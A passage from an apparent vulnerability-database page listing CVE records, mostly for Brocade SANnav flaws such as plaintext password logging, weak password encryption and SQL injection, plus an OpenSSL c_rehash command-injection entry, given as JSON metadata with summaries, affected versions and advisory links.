      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28168",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav before Brocade SANnav v2.2.0.2 and Brocade SANnav2.1.1.8, encoded scp-server passwords are stored using Base64 encoding, which could allow an attacker able to access log files to easily decode the passwords."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength."
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1979"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0003/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0003/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28168",
    "datePublished": "2022-06-27T17:52:02.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.470Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28167 (GCVE-0-2022-28167)

Vulnerability from nvd – Published: 2022-06-27 17:51 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log
Severity ?
No CVSS data available.
CWE
  • Plaintext Storage of a Password
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.349Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Plaintext Storage of a Password",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:14.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28167",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before Brocade SANvav v. 2.2.0.2 and Brocade SANanv v.2.1.1.8 logs the Brocade Fabric OS switch password in plain text in asyncjobscheduler-manager.log"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Plaintext Storage of a Password"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1978"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0002/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0002/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28167",
    "datePublished": "2022-06-27T17:51:56.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.349Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28166 (GCVE-0-2022-28166)

Vulnerability from nvd – Published: 2022-06-27 17:51 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 & 18082.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANnav Affected: versions before v2.2.0.2 and v2.1.1.8
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.389Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANnav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "versions before v2.2.0.2 and v2.1.1.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 \u0026 18082."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-27T19:06:17.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28166",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANnav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "versions before v2.2.0.2 and v2.1.1.8"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Brocade SANnav version before SANN2.2.0.2 and Brocade SANNav before 2.1.1.8, the implementation of TLS/SSL Server Supports the Use of Static Key Ciphers (ssl-static-key-ciphers) on ports 443 \u0026 18082."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1977"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220627-0001/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220627-0001/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28166",
    "datePublished": "2022-06-27T17:51:51.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.389Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2068 (GCVE-0-2022-2068)

Vulnerability from nvd – Published: 2022-06-21 14:45 – Updated: 2025-12-30 04:55
VLAI?
Title
The c_rehash script allows command injection
Summary
In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).
Severity ?
No CVSS data available.
CWE
  • Command injection
Assigner
References
Impacted products
Vendor Product Version
OpenSSL OpenSSL Affected: Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3)
Affected: Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o)
Affected: Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)
Create a notification for this product.
Date Public ?
2022-06-21 00:00
Credits
Chancen (Qingteng 73lab)
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:45:47.155Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.openssl.org/news/secadv/20220621.txt"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
          },
          {
            "name": "DSA-5169",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5169"
          },
          {
            "name": "FEDORA-2022-3b7d0abd0b",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
          },
          {
            "name": "FEDORA-2022-41890e9e44",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
          },
          {
            "url": "http://seclists.org/fulldisclosure/2024/Nov/0"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2022-2068",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2023-07-21T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-78",
                "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-30T04:55:27.130Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "OpenSSL",
          "vendor": "OpenSSL",
          "versions": [
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3)"
            },
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o)"
            },
            {
              "status": "affected",
              "version": "Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Chancen (Qingteng 73lab)"
        }
      ],
      "datePublic": "2022-06-21T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze)."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "lang": "eng",
              "url": "https://www.openssl.org/policies/secpolicy.html#Moderate",
              "value": "Moderate"
            },
            "type": "unknown"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Command injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-01-10T00:00:00.000Z",
        "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
        "shortName": "openssl"
      },
      "references": [
        {
          "url": "https://www.openssl.org/news/secadv/20220621.txt"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
        },
        {
          "name": "DSA-5169",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5169"
        },
        {
          "name": "FEDORA-2022-3b7d0abd0b",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
        },
        {
          "name": "FEDORA-2022-41890e9e44",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
        }
      ],
      "title": "The c_rehash script allows command injection"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5",
    "assignerShortName": "openssl",
    "cveId": "CVE-2022-2068",
    "datePublished": "2022-06-21T14:45:20.597Z",
    "dateReserved": "2022-06-13T00:00:00.000Z",
    "dateUpdated": "2025-12-30T04:55:27.130Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2022-28162 (GCVE-0-2022-28162)

Vulnerability from nvd – Published: 2022-05-09 16:31 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text.
Severity ?
No CVSS data available.
CWE
  • Cleartext Transmission of Sensitive Information
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.091Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Cleartext Transmission of Sensitive Information",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-09T16:31:49.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28162",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Cleartext Transmission of Sensitive Information"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1841"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28162",
    "datePublished": "2022-05-09T16:31:49.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.091Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28165 (GCVE-0-2022-28165)

Vulnerability from nvd – Published: 2022-05-06 16:08 – Updated: 2024-08-03 05:48
VLAI?
Summary
A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests.
Severity ?
No CVSS data available.
CWE
  • Improper Access Control
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:37.237Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Improper Access Control",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:08:34.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28165",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in the role-based access control (RBAC) functionality of the Brocade SANNav before 2.2.0 could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because restrictions are not performed on Server side to ensure the user has required permission before processing requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Improper Access Control"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1844"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28165",
    "datePublished": "2022-05-06T16:08:34.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:37.237Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28164 (GCVE-0-2022-28164)

Vulnerability from nvd – Published: 2022-05-06 16:01 – Updated: 2024-08-03 05:48
VLAI?
Summary
Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords.
Severity ?
No CVSS data available.
CWE
  • Inadequate Encryption Strength
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:48:36.887Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Brocade SANNav",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Brocade SANNav before 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Inadequate Encryption Strength",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-05-06T16:01:05.000Z",
        "orgId": "87b297d7-335e-4844-9551-11b97995a791",
        "shortName": "brocade"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "sirt@brocade.com",
          "ID": "CVE-2022-28164",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Brocade SANNav",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Brocade SANNav before 2.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brocade SANnav before SANnav 2.2.0 application uses the Blowfish symmetric encryption algorithm for the storage of passwords. This could allow an authenticated attacker to decrypt stored account passwords."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Inadequate Encryption Strength"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843",
              "refsource": "MISC",
              "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2022-1843"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "87b297d7-335e-4844-9551-11b97995a791",
    "assignerShortName": "brocade",
    "cveId": "CVE-2022-28164",
    "datePublished": "2022-05-06T16:01:05.000Z",
    "dateReserved": "2022-03-29T00:00:00.000Z",
    "dateUpdated": "2024-08-03T05:48:36.887Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-28163 (GCVE-0-2022-28163)

Vulnerability from nvd – Published: 2022-05-06 16:01 – Updated: 2024-08-03 05:48
VLAI?
Summary
In Brocade SANnav before Brocade SANnav 2.2.0, multiple endpoints associated with Zone management are susceptible to SQL injection, allowing an attacker to run arbitrary SQL commands.
Severity ?
No CVSS data available.
CWE
  • SQL Injection
Assigner
References
Impacted products
Vendor Product Version
n/a Brocade SANNav Affected: Brocade SANNav before 2.2.0
Show details on NVD website
To clipboard 

{
